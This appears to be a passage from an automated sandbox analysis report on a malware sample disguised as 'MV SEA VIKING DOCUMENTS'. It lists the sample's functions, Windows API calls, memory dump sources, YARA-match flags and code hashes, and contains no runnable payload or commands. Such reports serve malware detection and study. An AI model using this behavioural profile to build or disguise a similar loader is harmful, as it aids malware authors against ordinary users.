                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                                                                • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                                                                • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                                                • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 714912BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,714912DB,?,7149137F,00000019,714911CA,-000000A0), ref: 714912C5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                • Opcode ID: 897c77713e642b49c24dd6eb1c28b3726513ee33cef4162b7e77dcba8ef48a09
                                                                                                                                                                                                                                • Instruction ID: 5363df5263369699d54e5603e5073d0cd2069be19b6a2dc2c291146d9d445bf3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 897c77713e642b49c24dd6eb1c28b3726513ee33cef4162b7e77dcba8ef48a09
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2B012F2A08000DFEE008B65CD06F343264E710301F284000F600F4180C12048008734
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 0040498A Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                                                                                                                                                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                                                                                                                                • API String ID: 2624150263-3142480687
                                                                                                                                                                                                                                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                                                                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 71491BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 714912BB: GlobalAlloc.KERNELBASE(00000040,?,714912DB,?,7149137F,00000019,714911CA,-000000A0), ref: 714912C5
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 71491D2D
                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 71491D75
                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 71491D7F
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 71491D92
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 71491E74
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 71491E79
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 71491E7E
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 71492068
                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 71492222
                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 714922A1
                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(00000008), ref: 714922B2
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 7149230C
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000808), ref: 71492326
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 245916457-0
                                                                                                                                                                                                                                • Opcode ID: 94f6ce571b1a29c1d81c19d82183dc232bbaa2639cf5dee8fc9b8bd6f6e5c4f3
                                                                                                                                                                                                                                • Instruction ID: ce81d16a448b726e307faeb2e14e6a7b51dd4459b84c10e99a2c37866311974b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94f6ce571b1a29c1d81c19d82183dc232bbaa2639cf5dee8fc9b8bd6f6e5c4f3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B22CEB1D0420ADFDB12CFA4C584AEEBFB1FB04725F11462ED1A7E2284D7705A86CB58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                • API String ID: 542301482-670666241
                                                                                                                                                                                                                                • Opcode ID: 55b86572cfb51834f8a6099f072212e72d4708fdd526940039725dd414464e6b
                                                                                                                                                                                                                                • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55b86572cfb51834f8a6099f072212e72d4708fdd526940039725dd414464e6b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                                                                • Opcode ID: 87a3b61e224089aac6125e07325768922ee80bc423a702a39b70ed539d3d6996
                                                                                                                                                                                                                                • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87a3b61e224089aac6125e07325768922ee80bc423a702a39b70ed539d3d6996
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245300A Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: `wI
                                                                                                                                                                                                                                • API String ID: 0-1626042186
                                                                                                                                                                                                                                • Opcode ID: f48f528460ef97ffbd6e380b9c1f36b03ac9478392f229a26f28eb12f555722e
                                                                                                                                                                                                                                • Instruction ID: d8255971cd993a19eb7780f67d53d9c0faa8bcb86db6ac15bfa47fa69a4a8e16
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f48f528460ef97ffbd6e380b9c1f36b03ac9478392f229a26f28eb12f555722e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08616AB21843D956DB314E78484AFEB3BF2AF43A94F59024FDCC89B196C32A4586C752
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245F89B Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ;
                                                                                                                                                                                                                                • API String ID: 0-1661535913
                                                                                                                                                                                                                                • Opcode ID: ded3fc8bedde250aa3a6439810dc9cebc30258fe9e748f19020c41f2a960c275
                                                                                                                                                                                                                                • Instruction ID: 72aaf11048afc091d9600dcc84b0d53d3bc4fb00dc2378fe877228c101d6706a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ded3fc8bedde250aa3a6439810dc9cebc30258fe9e748f19020c41f2a960c275
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C851CE716446458FEF34CE29CC90BDA33B2EF99754F59812ECC499B706C3349A8ACB01
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02458E5A Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: %aGZ
                                                                                                                                                                                                                                • API String ID: 0-3409657903
                                                                                                                                                                                                                                • Opcode ID: bdb4b9a880eaa9ab4ad962783fb54d1cd890986258e994a92c917c19d8cc48ef
                                                                                                                                                                                                                                • Instruction ID: b3fab1f632d97e1924139629283aed8499af54881dd7677d894dd7307de71cec
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdb4b9a880eaa9ab4ad962783fb54d1cd890986258e994a92c917c19d8cc48ef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7351F332208754CBDB30CE1ACE947EB73E6AF85744F55452BDC8E8B605D730A982CB85
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00406D85 Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
